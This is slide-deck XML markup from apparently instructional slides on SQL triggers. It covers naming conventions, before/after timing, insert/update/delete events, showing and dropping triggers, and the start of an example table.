            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="950">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>before_insert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="950">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>after_update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>, etc.</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="374151"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="950">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>trg_table_name_before_insert</a:t>
            </a:r>
            <a:endParaRPr sz="950">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Timestamp:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1100">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-273050" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="374151"/>
              </a:buClr>
              <a:buSzPts val="700"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Optionally, you may include a timestamp to indicate when the trigger was created or modified. Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="950">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>trg_table_name_before_insert_20231128</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1900">
              <a:solidFill>
                <a:srgbClr val="006699"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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3" name="Shape 3423"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3424" name="Google Shape;3424;p553"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="131450" y="738600"/>
            <a:ext cx="8520600" cy="5727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1200"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3815">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Trigger Name Conventions</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3320">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3425" name="Google Shape;3425;p553"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381675" y="1657800"/>
            <a:ext cx="8708700" cy="26616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lang="en" sz="3800">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="935"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>trg_&lt;tableName&gt;_&lt;timing&gt;_&lt;action&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="935"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3800">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="935"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3800">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>trg_emp_before_insert</a:t>
            </a:r>
            <a:endParaRPr sz="3800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1363625"/>
            <a:ext cx="8520600" cy="2131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sz="3000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>How to create a file from source server to destination server ?</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>Or</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="36666"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
              </a:rPr>
              <a:t>How to execute a command from one server to another server ?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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554"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="131450" y="738600"/>
            <a:ext cx="8520600" cy="5727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1200"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3815">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Trigger Timing</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3320">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3431" name="Google Shape;3431;p554"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3789050" y="1713500"/>
            <a:ext cx="2367600" cy="2215800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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Clr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Before</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>After</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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5" name="Shape 3435"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3436" name="Google Shape;3436;p555"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="131450" y="738600"/>
            <a:ext cx="8520600" cy="5727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1200"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3815">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Trigger Event/Action</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3320">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3437" name="Google Shape;3437;p555"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3575525" y="1713500"/>
            <a:ext cx="2451000" cy="2215800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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Clr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Insert</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Update</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="3600"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Delete</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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1" name="Shape 3441"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3442" name="Google Shape;3442;p556"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="419250" y="942875"/>
            <a:ext cx="8520600" cy="5727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1200"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>How to display the triggers?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3443" name="Google Shape;3443;p556"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1228925" y="1671650"/>
            <a:ext cx="7256100" cy="19143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1200"/>
              </a:spcAft>
              <a:buSzPts val="935"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>show triggers;</a:t>
            </a:r>
            <a:endParaRPr sz="4800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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7" name="Shape 3447"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3448" name="Google Shape;3448;p557"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="159300" y="1147800"/>
            <a:ext cx="8520600" cy="5727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1200"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3815">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>How to delete a trigger</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3320">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3449" name="Google Shape;3449;p557"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="502400" y="1799250"/>
            <a:ext cx="8328000" cy="15450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1200"/>
              </a:spcAft>
              <a:buSzPts val="935"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DROP TRIGGER [IF EXISTS] trigger_name;</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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3" name="Shape 3453"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3454" name="Google Shape;3454;p558"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="462925"/>
            <a:ext cx="8520600" cy="5727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1200"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3815">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:highlight>
                  <a:schemeClr val="lt1"/>
                </a:highlight>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Triggers Example1</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3320"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3455" name="Google Shape;3455;p558"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1463150" y="2032575"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1688150"/>
                <a:gridCol w="1688150"/>
                <a:gridCol w="1688150"/>
                <a:gridCol w="1688150"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en" sz="1900"/>
                        <a:t>id</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="1900"/>
                    </a:p>
                  </a:txBody>
